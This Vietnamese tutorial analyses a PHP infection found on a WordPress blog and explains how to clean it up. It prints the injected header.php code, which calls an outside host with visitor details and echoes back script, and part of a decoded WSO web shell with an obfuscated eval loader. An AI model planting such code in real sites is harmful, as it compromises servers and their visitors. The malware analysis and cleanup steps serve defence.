Hủy bỏ WordPress Vi rút PHP

Hướng dẫn này trình bày một trường hợp cụ thể khi một blog WordPress nó đã bị nhiễm bệnh. Gỡ bỏ WordPress Virut PHP.

Một ngày nọ, tôi nhận thấy một mã đáng ngờ có vẻ là vi-rút PHP dành cho WordPress. Mã PHP sau đây đã có mặt trong header.php, trước dòng </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Đây là một số mã PHP có vẻ như đang cố truy xuất nội dung của tài nguyên từ một máy chủ bên ngoài, nhưng phần đề cập đến URL không đầy đủ.

Cơ chế làm việc có phần phức tạp hơn và thực hiện điều này WordPress Vi-rút PHP vô hình đối với khách truy cập của các trang web bị ảnh hưởng. Thay vào đó, nó nhắm mục tiêu vào các công cụ tìm kiếm (Google) và ngầm dẫn đến sự sụt giảm đáng kể số lượng khách truy cập vào các trang web bị ảnh hưởng.

Nội dung

Chi tiết về phần mềm độc hại WordPress PHP Virus

1. Đoạn mã trên có trong header.php.

2. Một tập tin xuất hiện trên máy chủ wp-log.php trong thư mục wp-includes.

3. wp-log.php chứa một mã được mã hóa, nhưng tương đối dễ giải mã.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Giải mã mã phần mềm độc hại từ wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

Đây dường như là một tập lệnh PHP độc hại có chứa mã để xử lý xác thực và các hành động trên các tệp và thư mục trên máy chủ. Có thể thấy rất dễ dàng rằng tập lệnh này chứa các biến như $auth_pass (mật khẩu xác thực), $default_action (hành động mặc định), $default_use_ajax (sử dụng Ajax theo mặc định) và $default_charset (cài đặt ký tự mặc định).

Rõ ràng, tập lệnh này có một phần kiểm tra các tác nhân người dùng HTTP để chặn quyền truy cập vào một số bot web nhất định, chẳng hạn như công cụ tìm kiếm. Nó cũng có phần kiểm tra chế độ bảo mật PHP và thiết lập các thư mục làm việc nhất định.

4. Nếu wp-log.php được truy cập trong trình duyệt, một trang web sẽ xuất hiện với trường đăng nhập. Thoạt nhìn, nó có vẻ là một trình quản lý tệp thông qua đó có thể dễ dàng tải các tệp mới lên máy chủ mục tiêu.

Làm thế nào để bạn devirus một trang web WordPress?

Luôn luôn, quy trình khử vi-rút thủ công trước tiên bao gồm việc phát hiện và hiểu lỗ hổng bảo mật là gì.

1. Tạo bản sao lưu cho toàn bộ trang web. Điều này phải bao gồm cả các tập tin và cơ sở dữ liệu.

2. Xác định khoảng thời gian vi-rút đã tồn tại và tìm kiếm máy chủ web để tìm các tệp được sửa đổi hoặc mới tạo trong khung thời gian gần đúng.

Ví dụ, nếu bạn muốn xem các tập tin .php được tạo hoặc sửa đổi trong tuần trước, hãy chạy lệnh trong máy chủ:

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

Đây là một phương pháp đơn giản để bạn có thể khám phá các tệp WordPress bị nhiễm và những người có chứa mã phần mềm độc hại.

3. Kiểm tra tệp .htaccess của các chỉ thị đáng ngờ. Dòng quyền hoặc thực thi tập lệnh.

4. Kiểm tra cơ sở dữ liệu. Rất có thể một số bài đăng và trang WordPress được chỉnh sửa bằng phần mềm độc hại hoặc phần mềm mới được thêm vào người dùng với vai trò của administrator.

5. Kiểm tra quyền ghi cho các thư mục và tập tin. chmod SI chown.

Các quyền được đề xuất là: 644 cho tệp và 755 cho thư mục.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Cập nhật tất cả WordPress Plugins / WordPress Themes.

Liên quan: Fix Redirect WordPress Hack 2023 (Virus Redirect)

Đây là những phương pháp "cơ bản" để bạn có thể devirus một trang web/blog WordPress. Nếu bạn gặp vấn đề và cần trợ giúp, phần bình luận sẽ được mở.